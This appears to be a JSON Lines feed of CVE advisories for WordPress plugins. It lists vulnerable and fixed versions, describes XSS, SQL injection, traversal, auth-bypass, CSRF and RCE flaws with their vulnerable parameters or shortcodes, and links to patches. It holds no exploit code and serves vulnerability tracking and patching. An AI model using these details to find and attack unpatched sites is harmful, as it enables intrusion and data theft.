{"CVE_ID":"CVE-2024-13648","slug":"maps-for-wp","versionImpact":"1.2.4","versionEndExcluding":"1.2.5","description":"The Maps for WP plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's 'MapOnePoint' shortcode in all versions up to, and including, 1.2.4 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"Update to version 1.2.5, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3226414%40maps-for-wp&new=3226414%40maps-for-wp&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3226414%40maps-for-wp&new=3226414%40maps-for-wp&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3242174%40maps-for-wp&new=3242174%40maps-for-wp&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3242174%40maps-for-wp&new=3242174%40maps-for-wp&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/a16c8b5d-fd93-49b4-b1d7-f4cd9248aef3?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/a16c8b5d-fd93-49b4-b1d7-f4cd9248aef3?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-11764","slug":"solar-wizard-lite","versionImpact":"1.2.4","versionEndExcluding":"1.2.5","description":"The Solar Wizard Lite plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's 'solar_wizard' shortcode in all versions up to, and including, 1.2.4 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"Update to version 1.2.5, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3215301%40solar-wizard-lite&new=3215301%40solar-wizard-lite&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3215301%40solar-wizard-lite&new=3215301%40solar-wizard-lite&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/adcab262-08ca-448d-b1fd-295d421b82a3?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/adcab262-08ca-448d-b1fd-295d421b82a3?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-13680","slug":"cp-easy-form-builder","versionImpact":"1.2.41","versionEndExcluding":"1.2.42","description":"The Form Builder CP plugin for WordPress is vulnerable to SQL Injection via the 'id' parameter of the 'CP_EASY_FORM_WILL_APPEAR_HERE' shortcode in all versions up to, and including, 1.2.41 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query.  This makes it possible for authenticated attackers, with Contributor-level access and above, to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database.","recommendation":"Update to version 1.2.42, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/cp-easy-form-builder\\\/tags\\\/1.2.41\\\/cp_easy_form_builder.php#L297\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/cp-easy-form-builder\\\/tags\\\/1.2.41\\\/cp_easy_form_builder.php#L297\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3214984%40cp-easy-form-builder&new=3214984%40cp-easy-form-builder&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3214984%40cp-easy-form-builder&new=3214984%40cp-easy-form-builder&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/a018fcb1-b7a6-456f-ab0b-59ccc1fd5b67?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/a018fcb1-b7a6-456f-ab0b-59ccc1fd5b67?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-6446","slug":"calculated-fields-form","versionImpact":"1.2.40","versionEndExcluding":"1.2.41","description":"The Calculated Fields Form plugin for WordPress is vulnerable to Stored Cross-Site Scripting via admin settings in all versions up to, and including, 1.2.40 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with administrator-level permissions and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. This only affects multi-site installations and installations where unfiltered_html has been disabled.","recommendation":"Update to version 1.2.41, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/c879123c-531e-43d8-a7d3-16a3c86b68a3?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/c879123c-531e-43d8-a7d3-16a3c86b68a3?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3005354\\\/calculated-fields-form\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3005354\\\/calculated-fields-form\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-1264","slug":"broken-link-checker-seo","versionImpact":"1.2.3","versionEndExcluding":"1.2.4","description":"The Broken Link Checker by AIOSEO \u2013 Easily Fix\/Monitor Internal and External links plugin for WordPress is vulnerable to SQL Injection via the 'orderBy' parameter in all versions up to, and including, 1.2.3 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query.  This makes it possible for authenticated attackers, with Contributor-level access and above, to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database.","recommendation":"Update to version 1.2.4, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/broken-link-checker-seo\\\/trunk\\\/app\\\/Api\\\/Api.php#L42\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/broken-link-checker-seo\\\/trunk\\\/app\\\/Api\\\/Api.php#L42\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/broken-link-checker-seo\\\/trunk\\\/app\\\/Api\\\/LinkStatusTable.php#L31\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/broken-link-checker-seo\\\/trunk\\\/app\\\/Api\\\/LinkStatusTable.php#L31\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/broken-link-checker-seo\\\/trunk\\\/app\\\/Core\\\/Database.php#L1357\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/broken-link-checker-seo\\\/trunk\\\/app\\\/Core\\\/Database.php#L1357\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/broken-link-checker-seo\\\/trunk\\\/app\\\/Core\\\/Database.php#L552\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/broken-link-checker-seo\\\/trunk\\\/app\\\/Core\\\/Database.php#L552\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3263416%40broken-link-checker-seo&new=3263416%40broken-link-checker-seo&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3263416%40broken-link-checker-seo&new=3263416%40broken-link-checker-seo&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/broken-link-checker-seo\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/broken-link-checker-seo\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/ce2d582e-4f50-4b55-9f3b-3c46d96c0927?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/ce2d582e-4f50-4b55-9f3b-3c46d96c0927?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-11426","slug":"autolisticle-automatically-update-numbered-list-articles","versionImpact":"1.2.3","versionEndExcluding":"1.2.4","description":"The AutoListicle: Automatically Update Numbered List Articles plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's 'auto-list-number' shortcode in all versions up to, and including, 1.2.3 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"Update to version 1.2.4, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/autolisticle-automatically-update-numbered-list-articles\\\/trunk\\\/autolisticle.php#L62\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/autolisticle-automatically-update-numbered-list-articles\\\/trunk\\\/autolisticle.php#L62\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3194263%40autolisticle-automatically-update-numbered-list-articles&new=3194263%40autolisticle-automatically-update-numbered-list-articles&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3194263%40autolisticle-automatically-update-numbered-list-articles&new=3194263%40autolisticle-automatically-update-numbered-list-articles&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/e75313c5-dbc9-4a33-898e-47d8fd299a42?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/e75313c5-dbc9-4a33-898e-47d8fd299a42?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-12405","slug":"export-customers-data","versionImpact":"1.2.3","versionEndExcluding":"1.2.4","description":"The Export Customers Data plugin for WordPress is vulnerable to Reflected Cross-Site Scripting via the 't' parameter in all versions up to, and including, 1.2.3 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link.","recommendation":"Update to version 1.2.4, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3210666%40export-customers-data&new=3210666%40export-customers-data&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3210666%40export-customers-data&new=3210666%40export-customers-data&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/ed61c037-a73c-477e-a5b5-3b4781cec130?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/ed61c037-a73c-477e-a5b5-3b4781cec130?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-0697","slug":"backuply","versionImpact":"1.2.3","versionEndExcluding":"1.2.4","description":"The Backuply \u2013 Backup, Restore, Migrate and Clone plugin for WordPress is vulnerable to Directory Traversal in all versions up to, and including, 1.2.3 via the node_id parameter in the backuply_get_jstree function. This makes it possible for attackers with administrator privileges or higher to read the contents of arbitrary files on the server, which can contain sensitive information.","recommendation":"Update to version 1.2.4, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/70effa22-fbf6-44cb-9d1b-8625969c10ac?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/70effa22-fbf6-44cb-9d1b-8625969c10ac?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3026806%40backuply&new=3026806%40backuply&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3026806%40backuply&new=3026806%40backuply&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-2351","slug":"wpdirectorykit","versionImpact":"1.2.3","versionEndExcluding":"1.2.4","description":"The WP Directory Kit plugin for WordPress is vulnerable to unauthorized modification of data and loss of data due to a missing capability check on the 'ajax_admin' function in versions up to, and including, 1.2.3. This makes it possible for authenticated attackers with subscriber-level permissions or above to delete or change plugin settings, import demo data, delete Directory Kit related posts and terms, and install arbitrary plugins. A partial patch was introduced in version 1.2.0.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=2917413%40wpdirectorykit&new=2917413%40wpdirectorykit&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=2917413%40wpdirectorykit&new=2917413%40wpdirectorykit&sfp_email=&sfph_mail=\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=2905046%40wpdirectorykit&new=2905046%40wpdirectorykit&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=2905046%40wpdirectorykit&new=2905046%40wpdirectorykit&sfp_email=&sfph_mail=\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=2907164%40wpdirectorykit&new=2907164%40wpdirectorykit&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=2907164%40wpdirectorykit&new=2907164%40wpdirectorykit&sfp_email=&sfph_mail=\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wpdirectorykit\\\/tags\\\/1.1.8\\\/public\\\/class-wpdirectorykit-public.php#L249\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wpdirectorykit\\\/tags\\\/1.1.8\\\/public\\\/class-wpdirectorykit-public.php#L249\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/50c5154c-1573-4c2b-85a1-a89bdb22dc7d?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/50c5154c-1573-4c2b-85a1-a89bdb22dc7d?source=cve\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=2905795%40wpdirectorykit&new=2905795%40wpdirectorykit&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=2905795%40wpdirectorykit&new=2905795%40wpdirectorykit&sfp_email=&sfph_mail=\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-9890","slug":"user-toolkit","versionImpact":"1.2.3","versionEndExcluding":"1.2.4","description":"The User Toolkit plugin for WordPress is vulnerable to authentication bypass in versions up to, and including, 1.2.3. This is due to an improper capability check in the 'switchUser' function. This makes it possible for authenticated attackers, with subscriber-level permissions and above, to log in as any existing user on the site, such as an administrator.","recommendation":"Update to version 1.2.4, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/805f18e2-9a5a-48cf-81f4-825da4bfd8ef?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/805f18e2-9a5a-48cf-81f4-825da4bfd8ef?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/user-toolkit\\\/tags\\\/1.2.3\\\/src\\\/UserSwitch.php#L51\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/user-toolkit\\\/tags\\\/1.2.3\\\/src\\\/UserSwitch.php#L51\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3175190\\\/user-toolkit#file5\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3175190\\\/user-toolkit#file5\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-2527","slug":"cf7-zoho","versionEndExcluding":"1.2.4","description":"The Integration for Contact Form 7 and Zoho CRM, Bigin WordPress plugin before 1.2.4 does not sanitize and escape some of its settings, which could allow high-privilege users such as admin to perform Stored Cross-Site Scripting attacks even when the unfiltered_html capability is disallowed (for example in multisite setup)","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/8051142a-4e55-4dc2-9cb1-1b724c67574f\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/8051142a-4e55-4dc2-9cb1-1b724c67574f\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-3481","slug":"counter-box","versionImpact":"1.2.3","versionEndExcluding":"1.2.4","description":"The Counter Box  WordPress plugin before 1.2.4 does not have CSRF checks in some bulk actions, which could allow attackers to make logged in admins perform unwanted actions, such deleting counters via CSRF attacks","recommendation":"Update to version 1.2.4, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/0c441293-e7f9-4634-8f3a-09925cd2b696\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/0c441293-e7f9-4634-8f3a-09925cd2b696\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-5029","slug":"cm-table-of-content","versionImpact":"1.2.3","versionEndExcluding":"1.2.4","description":"The CM Table Of Contents  WordPress plugin before 1.2.4 does not have CSRF check when updating its settings, and is missing sanitisation as well as escaping, which could allow attackers to make logged in admin add Stored XSS payloads via a CSRF attack.","recommendation":"Update to version 1.2.4, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/f0f4a33c-9dd2-45ee-82e7-4b8bc2c20094\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/f0f4a33c-9dd2-45ee-82e7-4b8bc2c20094\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-5641","slug":"martins-link-network","versionImpact":"1.2.29","versionEndExcluding":"1.2.30","description":"The Martins Free & Easy SEO BackLink Link Building Network WordPress plugin before 1.2.30 does not sanitise and escape a parameter before outputting it back in the page, leading to a Reflected Cross-Site Scripting which could be used against high privilege users such as admin","recommendation":"Update to version 1.2.30, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/c0a6c253-71f2-415d-a6ec-022f2eafc13b\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/c0a6c253-71f2-415d-a6ec-022f2eafc13b\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-5762","slug":"filr-protection","versionEndExcluding":"1.2.3.6","description":"The Filr WordPress plugin before 1.2.3.6 is vulnerable from an RCE (Remote Code Execution) vulnerability, which allows the operating system to execute commands and fully compromise the server on behalf of a user with Author-level privileges.","recommendation":"Update to version 1.2.3.6, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/6ad99725-eccc-4b61-bce2-668b62619deb\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/6ad99725-eccc-4b61-bce2-668b62619deb\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-13401","slug":"wp-paypal","versionImpact":"1.2.3.35","versionEndExcluding":"1.2.3.36","description":"The Payment Button for PayPal plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's 'wp_paypal_checkout' shortcode in all versions up to, and including, 1.2.3.35 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"Update to version 1.2.3.36, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wp-paypal\\\/trunk\\\/main.php#L72\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wp-paypal\\\/trunk\\\/main.php#L72\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wp-paypal\\\/trunk\\\/wp-paypal-checkout.php#L3\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wp-paypal\\\/trunk\\\/wp-paypal-checkout.php#L3\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3223257%40wp-paypal&new=3223257%40wp-paypal&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3223257%40wp-paypal&new=3223257%40wp-paypal&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/20fc675c-08a4-4d77-9872-335d23146906?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/20fc675c-08a4-4d77-9872-335d23146906?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-0239","slug":"ari-cf7-connector","versionImpact":"1.2.2","versionEndExcluding":"1.2.3","description":"The Contact Form 7 Connector WordPress plugin before 1.2.3 does not sanitise and escape a parameter before outputting it back in the page, leading to a Reflected Cross-Site Scripting which could be used against administrators.","recommendation":"Update to version 1.2.3, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/b9a4a3e3-7cdd-4354-8541-4219bd41c854\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/b9a4a3e3-7cdd-4354-8541-4219bd41c854\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-10782","slug":"theme-builder-for-elementor","versionImpact":"1.2.2","versionEndExcluding":"1.2.3","description":"The Theme Builder For Elementor plugin for WordPress is vulnerable to Information Exposure in all versions up to, and including, 1.2.2 via the 'elementor-template' shortcode due to insufficient restrictions on which posts can be included. This makes it possible for authenticated attackers, with Contributor-level access and above, to extract data from private or draft posts created by Elementor that they should not have access to.","recommendation":"Update to version 1.2.3, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3187424%40theme-builder-for-elementor&new=3187424%40theme-builder-for-elementor&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3187424%40theme-builder-for-elementor&new=3187424%40theme-builder-for-elementor&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/73ad8840-b60f-4a92-b1c9-0996f78ab6b4?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/73ad8840-b60f-4a92-b1c9-0996f78ab6b4?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-4757","slug":"ldap-ad-staff-employee-directory-search","versionImpact":"1.2.2","versionEndExcluding":"1.2.3","description":"The Staff \/ Employee Business Directory for Active Directory WordPress plugin before 1.2.3 does not sanitize and escape data returned from the LDAP server before rendering it in the page, allowing users who can control their entries in the LDAP directory to inject malicious javascript which could be used against high-privilege users such as a site admin.","recommendation":"Update to version 1.2.3, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/0b953413-cf41-4de7-ac1f-c6cb995fb158\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/0b953413-cf41-4de7-ac1f-c6cb995fb158\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-8427","slug":"frontend-post-submission-manager-lite","versionImpact":"1.2.2","versionEndExcluding":"1.2.3","description":"The Frontend Post Submission Manager Lite \u2013 Frontend Posting WordPress Plugin plugin for WordPress is vulnerable to unauthorized modification of data due to a missing capability check on the save_global_settings and process_form_edit functions in all versions up to, and including, 1.2.2. This makes it possible for authenticated attackers, with Subscriber-level access and above, to update the plugin's settings and forms.","recommendation":"Update to version 1.2.3, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/e84b68b6-1ce8-45fb-823f-a61158aa4d21?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/e84b68b6-1ce8-45fb-823f-a61158aa4d21?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3147218\\\/frontend-post-submission-manager-lite\\\/trunk\\\/includes\\\/classes\\\/admin\\\/class-fpsml-ajax-admin.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3147218\\\/frontend-post-submission-manager-lite\\\/trunk\\\/includes\\\/classes\\\/admin\\\/class-fpsml-ajax-admin.php\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/frontend-post-submission-manager-lite\\\/tags\\\/1.2.2\\\/includes\\\/classes\\\/admin\\\/class-fpsml-ajax-admin.php#L25\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/frontend-post-submission-manager-lite\\\/tags\\\/1.2.2\\\/includes\\\/classes\\\/admin\\\/class-fpsml-ajax-admin.php#L25\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-47191","slug":"youzify","versionEndExcluding":"1.2.3","description":"Authorization Bypass Through User-Controlled Key vulnerability in KaineLabs Youzify \u2013 BuddyPress Community, User Profile, Social Network & Membership Plugin for WordPress. This issue affects Youzify \u2013 BuddyPress Community, User Profile, Social Network & Membership Plugin for WordPress: from n\/a through 1.2.2.","refs":"[{\"url\":\"https:\\\/\\\/patchstack.com\\\/database\\\/vulnerability\\\/youzify\\\/wordpress-youzify-plugin-1-2-2-insecure-direct-object-reference-idor-vulnerability?_s_id=cve\",\"name\":\"https:\\\/\\\/patchstack.com\\\/database\\\/vulnerability\\\/youzify\\\/wordpress-youzify-plugin-1-2-2-insecure-direct-object-reference-idor-vulnerability?_s_id=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2022-4833","slug":"yourchannel","versionEndExcluding":"1.2.3","description":"The YourChannel: Everything you want in a YouTube plugin WordPress plugin before 1.2.3 does not validate and escape some of its shortcode attributes before outputting them back in the page, which could allow users with a role as low as contributor to perform Stored Cross-Site Scripting attacks which could be used against high privilege users such as admins.","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/35ba38cf-4f23-4344-8de3-cf3004ebf84c\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/35ba38cf-4f23-4344-8de3-cf3004ebf84c\",\"refsource\":\"MISC\",\"tags\":[]}]"}
